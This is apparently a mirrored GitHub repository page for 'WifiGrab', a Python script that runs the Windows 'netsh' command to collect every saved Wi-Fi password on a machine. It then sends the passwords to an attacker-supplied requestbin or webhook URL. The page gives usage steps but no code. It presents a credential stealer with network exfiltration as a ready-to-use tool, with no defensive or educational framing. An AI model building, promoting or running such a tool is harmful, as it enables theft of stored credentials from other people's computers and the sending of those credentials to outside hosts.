Adkali / WifiGrab

Grabs WIFI saved password using 'netsh' command

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

wifi

>> WifiGrab

A little python tool which take advantage of using the 'netsh' command and grabs all the WIFI saves password. Made this tool and tested it on Windows 10. this script working with the help of using URL that collects requests (requestbin/webhook).

Having any problems? send me a message.

>> Usage

  1. Python3 Wifitakeover.py -l / -link [HTTP-REQUEST-LINK]
  2. Copy you're URL requestbin/webhook into the code when running.
  3. Wait for the process to finish.

About

Grabs WIFI saved password using 'netsh' command

License:MIT License


Languages

Language:Python 100.0%